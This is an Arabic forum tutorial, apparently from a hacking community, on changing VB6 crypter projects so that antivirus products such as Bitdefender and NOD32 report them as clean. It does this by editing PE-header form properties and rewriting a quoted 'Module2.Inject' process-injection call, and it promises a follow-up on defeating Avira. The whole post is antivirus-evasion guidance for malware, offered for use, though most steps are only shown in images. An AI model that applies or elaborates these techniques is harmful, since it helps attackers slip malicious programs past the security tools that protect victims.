حالة الموضوع:
مغلق
  1. .:: RSS ::.

    .:: RSS ::. عضوية آلية

    الأنتساب:
    ‏9 سبتمبر 2011
    المشاركات:
    14,005
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    36
    الإقامة:
    IQ-T34M
    [​IMG]



    كيفكم اخواني الغالين بعد غيابي عن المنتدى لفترى طويلة
    عدت لكم لكن كلي اسف وخيبة أمل في ما يتعلق بالتشفير لا اقلل من حجم احد او من موضوع اي شخص لكن ما اشاهده هو تخبط وتعثر للحصول على اللون الاخضر دون العلمية وصراخ بعض الناس
    زمن التشفير بال VB6 انتهى ومن هذه الكلمات الرنانه !!
    [​IMG]
    من قال هذا !! وما دليلكم وما دليل على ان VB6 غير ثابت غير مستقر ومن هذا الكلام يأخي كيف تقول الهكس افضل واحسن
    هل تعلم انك تستطيع حصر القيم الثنائية والثلاثية من خلال الفجول !!:2:
    الامر يحتاج الى قليل من التركيز والصبر

    في درس اليوم راح اتكلم عن اماكن وجود القيم وحصرها وتغيرها والوصل للكلين بعلمية وليس همجية واثبات قوة
    VB6

    [​IMG]
    في الاول خلي في بالك هناك قيم متشاركه عد اكثر من مكافح فايروسات يعني 3 او 4 برامج لها نفس القيمة

    نبدأ ببرنامج bitdefender هذا البرنامج يعتمد في تحليله واحفظة للقيم على اساس واحد وهو PE HEADr ومن لا يعرف ماهو PE HEADR اشرحه في درس منفصل
    لاحظ هذه القيمة
    [​IMG]
    هذه القيمة لو تحذف كل محتويات السورس كود الي عندك وتفحص تجدها موجوده ما يعني انها لا توجود في اي سطر برمجي عجيبة طب اين توجود !!!
    طبعا في موضوع عندي قديم عن طريقة تحليل اسم القيمة الي يضعها برنامج الحماية اطلع عليه لتستفاد اكثر
    نرجع هذه القيمة موجود في PE ونقدر نعدل على PE من خلال التعديل على form في مشروعك طب وين نعدل يا يزيدون !!
    [​IMG]
    [​IMG]
    [​IMG]
    شوف تعدل هنا بالخصائص بالي يعجبك وبهذا كل شخص يعدل على مزاجه ما راح يصير تشابه بالتعديل وحصر للتعديل عند برامج الحماية
    بأمكانك ان تصنع GUI فورم خاص بك وبهذا PE خاصك تغير تغير جذري وخاص فيك
    بعد التغير لاحظ نوع القمية الي تخرج عندك
    [​IMG]
    شوف كيف تغيرت اصبحت الان في سطر برمجي ممكن تعدل وتحصل على كلين
    نقطه مهمه حين نحاول نعدل على PE راح نحصل على نتائج مرضيه لباقي برامج الحماية

    طيب وين هذا السطر البرمجي الي في هذه القيمة شوف الصوره
    [​IMG]
    [​IMG][​IMG]

    راح تسأل كيف اشفرها تشفيرها بالتغير بالمتغيرات وبعض النصوص وبعض الاشياء اترك البحص لك في الوصل لها ولو صعبت اشرحها لا تقول زيدون كمل شرحك واكمل ما الفائده انك تستلم كل شيئ على الجاهز أين ابداعك !!
    طبعا النود عدنه راح نطيح قيمة منه وراح ادليك على القيمة الي يمسكها النود ويبقى الباقي عليك كيف تتلاعب في
    حرك عقلك شويه
    [​IMG]
    [INFO]Call Module2.Inject(nt(), App.Path & "\" & App.EXEName & ".exe", vbNullString) [/INFO]
    [​IMG]
    شوف أمر الاستدعاء هذا لو فكرت في طريقة برمجيه ثانيه تغير منه راح تريح بالك من النود !!

    درس جدا سلس وسهل ما عليك الا التطبيق والبحث عن الاشياء الي حددتها لك وترى النتيجه

    الدرس الثاني الاطاحه بالافيرا وحصر السطر البرمجي وطريقة الاطاحه به

    وهذه نتيجة الفحص ركز وشوف كم برنامج مشترك بالقيمه هذه
    اضغط هنا

    [​IMG]
    تمنياتي لكم بالموفقيه
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة